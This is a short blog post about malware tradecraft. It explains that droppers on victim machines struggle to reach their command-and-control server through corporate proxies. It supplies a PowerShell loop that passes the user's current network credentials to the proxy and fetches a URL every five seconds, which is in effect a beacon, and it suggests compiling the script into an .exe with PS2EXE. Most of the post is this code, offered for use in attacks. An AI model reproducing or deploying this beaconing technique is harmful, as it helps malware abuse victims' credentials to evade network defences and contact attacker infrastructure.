Thursday, 5 May 2016

Authenticate to proxy with current credentials


Droppers when deployed on victim machines attempt to connect to C&C centre however corporate proxy comes into picture

Below Powershell code will authenticate to proxy via current credentials and fetch contents from "http://microsoft.com"


for($i=0; $i -le 0; $i)
{
$wc = New-Object System.Net.WebClient
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$wc.DownloadString('http://microsoft.com')
Start-Sleep -s 5

}


















We can further create powershell script executable .exe file with PS2EXE